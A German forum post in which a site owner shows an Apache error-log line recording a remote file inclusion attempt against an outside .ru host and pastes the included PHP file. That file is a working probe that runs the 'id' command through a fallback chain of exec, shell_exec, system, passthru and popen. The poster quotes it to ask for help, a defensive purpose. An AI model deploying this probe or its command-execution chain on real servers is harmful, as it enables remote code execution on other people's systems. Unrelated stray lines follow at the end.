Einbruchversuch/Hack oder harmlos?
Habe seit einigen Tagen in einem error.log (von Apache) immer wieder folgende Zeile stehen:
File does not exist: /LOKALERPFADZUMPROJEKT/@rfihttp://www.ryjyk.ru/phpBB2/language/id.txt
und frage mich, ob das ein versuchter Hack ist oder “nur” ein fehlgeleitetes Script.
Wer kann mir dazu etwas sagen bitte? Weiß nicht, wonach ich suchen soll und der Code ist für mich nicht verständlich. Der Inhalt der Datei, auf die verwiesen wird:
<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;
EvenInhinue on 
SWR on 
fht on 
Shikonotama on 
hyundai tiburon on